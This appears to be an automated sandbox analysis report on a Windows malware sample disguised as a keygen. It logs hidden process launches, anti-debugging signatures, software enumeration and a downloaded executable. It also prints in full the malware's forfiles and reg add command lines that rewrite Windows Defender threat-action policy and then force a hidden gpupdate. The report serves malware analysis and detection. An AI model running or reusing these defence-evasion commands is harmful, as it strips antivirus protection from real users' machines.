file	C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl

WaitFor has been invoked (possibly to delay malicious activity)

Executes one or more WMI queries (1 event)

wmi	<INVALID POINTER>

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 17, 2024, 10:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\acFYONjqGQhfMgmKNG1gZnmY.exe parameters: filepath: C:\Users\test22\Pictures\acFYONjqGQhfMgmKNG1gZnmY.exe	1	1
ShellExecuteExW Aug. 17, 2024, 10:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\vgdyfc1VcBsqmc2SsNuc62Y1.exe parameters: filepath: C:\Users\test22\Pictures\vgdyfc1VcBsqmc2SsNuc62Y1.exe	1	1
ShellExecuteExW Aug. 17, 2024, 10:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\z7sqTTpo7jhmcMDp0blbc6Qe.exe parameters: filepath: C:\Users\test22\Pictures\z7sqTTpo7jhmcMDp0blbc6Qe.exe	1	1
ShellExecuteExW Aug. 17, 2024, 10:05 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\bY1WXV8eleObWNCtpR7Kl9vV.exe parameters: filepath: C:\Users\test22\Pictures\bY1WXV8eleObWNCtpR7Kl9vV.exe	1	1
CreateProcessInternalW Aug. 17, 2024, 10:12 p.m.	thread_identifier: 3004 thread_handle: 0x00000318 process_identifier: 3000 current_directory: C:\Users\test22\AppData\Local\Temp\7zSAEE3.tmp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000320	1	1
ShellExecuteExW Aug. 17, 2024, 10:12 p.m.	show_type: 0 filepath_r: cmd parameters: /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath: cmd	1	1
CreateProcessInternalW Aug. 17, 2024, 10:12 p.m.	thread_identifier: 156 thread_handle: 0x0000012c process_identifier: 2344 current_directory: C:\Users\test22\AppData\Local\Temp\7zSAEE3.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 17, 2024, 10:12 p.m.	thread_identifier: 2688 thread_handle: 0x0000011c process_identifier: 2684 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 17, 2024, 10:12 p.m.	thread_identifier: 2636 thread_handle: 0x0000012c process_identifier: 1596 current_directory: c:\windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
ShellExecuteExW Aug. 17, 2024, 10:12 p.m.	show_type: 0 filepath_r: C:\Windows\system32\gpupdate.exe parameters: /force filepath: C:\Windows\System32\gpupdate.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 17, 2024, 10:12 p.m.	process_identifier: 2924 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 1433600 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 17, 2024, 10:04 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process file1.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Aug. 17, 2024, 10:04 p.m.	buffer: HTTP/1.1 200 OK Date: Sat, 17 Aug 2024 13:13:06 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 265728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $°F]ô÷(ô÷(ô÷(ê¥¬é÷(ê¥½ç÷(ê¥«¬÷(Ó1Sñ÷(ô÷)÷(ê¥¢õ÷(ê¥¼õ÷(ê¥¹õ÷(Richô÷(PELt dà 4ÒcP@0´f<øPh.textÜ24 `.rdataàP 8@@.data¸pX@À.rsrcøv@@ÿ%0PB; pBuóÃéXjhdBèKuötu=°qCuCjè< YeüVèd YEäÀt VPè YYÇEüþÿÿÿè}äu7ÿuë jè( YÃVjÿ5BÿPBÀuè)ðÿPPBPèÙYèÃÿUìQeüVEüPÿuÿuèðÄöu9EütèåÀt èÜMüÆ^ÉÃÿUìEVñÆFÀucèN$FHlHhN; °xBt ÌwBHpuèé F;ÐvBtF ÌwBHpuè]FFö@puHpÆFë @FÆ^]ÂÿUìì3ÉWø;ñt3Àf;Ùy9Mp8hÿuMðè?ÿÿÿEðxu.ötf¶fEÀtÇ}ü;Eø`pýé/?t~O¸¬~23ÉöÁQVjWj ÿpÿPBÀt'EÀt²Mð¬ë¥'èÇöt3ÀfEÀtÿèo}üºMøapýé®EðP¶Pè´%YYÀtZMð¬9EsEÀ7ÿÿÿÇþÿÿÿé,ÿÿÿø~3ÒöÂRVPSj ÿqÿPBÀPÿÿÿ{FÿÿÿéUÿÿÿ3ÀöÀ3ÿGPEðVWSj ÿpÿPBÀ4ÿÿÿEÀËþÿÿ8éÄþÿÿE;Át3À_ÉÃÿUìQEMüÿÀu¸`BS]VjÿuMüQ3öè0þÿÿEüÄ^[ÉÃjh dBèeäu;5 qCw"jèYeüVèYEäÇEüþÿÿÿè Eäè(Ãjè YÃÿUìVuþà¡SW=PB=BuèÜjè)hÿèl&YY¡°qCøuötÆë3À@PëøuVèSÿÿÿYÀuöuFÆæðVjÿ5Bÿ×ØÛu.j^9BtÿuèºYÀtué{ÿÿÿè~0èw0_Ã[ëVè*YècÇ3À^]ÃÿUìj jÿuèÈ,Ä]ÃÿUì]éßÿÿÿÿUìQSVWÿ5qCèkÿ5qCø}üè[ðYY;÷Þ+ßCørwWè-øCY;øsH¸;øsÇÇ;ÇrPÿuüè-YYÀuG;Çr@Pÿuüèø,YYÀt1ÁûP4èvY£qCÿuèhÆVè]Y£qCEYë3À_^[ÉÃÿVjj èb,ðVè6Ä£qC£qCöujX^Ã&3À^Ãjh@dBè÷èÖ$eüÿuèøþÿÿYEäÇEüþÿÿÿè EäèÃèµ$ÃÿUìÿuè·ÿÿÿ÷ØÀ÷ØYH]ÃÿUì=lBuèÈ(ÿuè'hÿèW$YY]ÃjXh`dBè{3öuüEPÿPBjþ_}ü¸MZf9@u8¡<@¸@PEu'¹f9@u¸t@v3É9°è@ÁMäëuä3ÛCSèpYÀujèXÿÿÿYè( ÀujèGÿÿÿYè65]üèÚ2À}jèV#YÿPB£´qCè1£dBè received: 2920 socket: 1496	1	2920	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 17, 2024, 10:12 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (17 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 78 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall		2
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000154 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: 7-Zip base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: AddressBook base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Connection Manager base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Fontcore base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: HashTab base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HashTab	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE40 base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE4Data base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IEData base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Mozilla Firefox 105.0.1 (x64 en-US) base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: MozillaMaintenanceService base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: WIC base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {90150000-002A-0000-1000-0000000FF1CE} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0000-1000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {90150000-002A-0409-1000-0000000FF1CE} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002A-0409-1000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {90150000-0116-0409-1000-0000000FF1CE} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0116-0409-1000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042 base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000154 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: 7-Zip base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: AddressBook base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Adobe AIR base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Connection Manager base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: EditPlus base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Fontcore base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Google Chrome base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE40 base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE4Data base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: IEData base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: WIC base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW Aug. 17, 2024, 10:12 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000154 key_handle: 0x000000fc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1	0

Uses Windows utilities for basic Windows functionality (14 events)

cmdline	forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
